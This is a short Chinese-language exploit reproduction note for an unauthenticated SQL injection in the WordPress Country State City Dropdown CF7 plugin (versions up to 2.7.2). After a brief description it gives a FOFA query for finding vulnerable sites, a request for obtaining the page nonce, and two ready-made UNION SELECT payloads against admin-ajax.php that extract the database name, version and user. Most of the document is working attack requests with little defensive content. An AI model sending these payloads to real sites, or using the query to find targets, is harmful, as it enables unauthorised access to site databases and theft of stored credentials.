W18-1WordPress-CF7插件-SQL
漏洞描述:
由于WordPress的Country State City Dropdown CF7插件在2.7.2及以下的版本中存在SQL注入漏洞,未经身份验证的远程攻击者可利用此漏洞获取数据库敏感信息,导致凭证密钥等信息泄露,深入利用还可能会对服务器造成严重威胁。
影响版本:
Country State City Dropdown CF7 <= 2.7.2
fofa语法:
body=“/wp-content/plugins/country-state-city-auto-dropdown/”
漏洞复现:
访问首页获取nonce的值
payload:
GET / HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
效果图:
携带 nonce的值进行注入
查询数据库名称+数据库版本+当前用户
payload:
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
action=tc_csca_get_states&nonce_ajax=2c72d99abc&cnt=1+or+0+union+select+concat%280x64617461626173653a%2Cdatabase%28%29%2C0x7c76657273696f6e3a%2Cversion%28%29%2C0x7c757365723a%2Cuser%28%29%29%2C2%2C3--+-
效果图:
payload:
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
action=tc_csca_get_cities&nonce_ajax=2c72d99abc&sid=1+or+0+union+select+concat%280x64617461626173653a%2Cdatabase%28%29%2C0x7c76657273696f6e3a%2Cversion%28%29%2C0x7c757365723a%2Cuser%28%29%29%2C2%2C3--+-
效果图: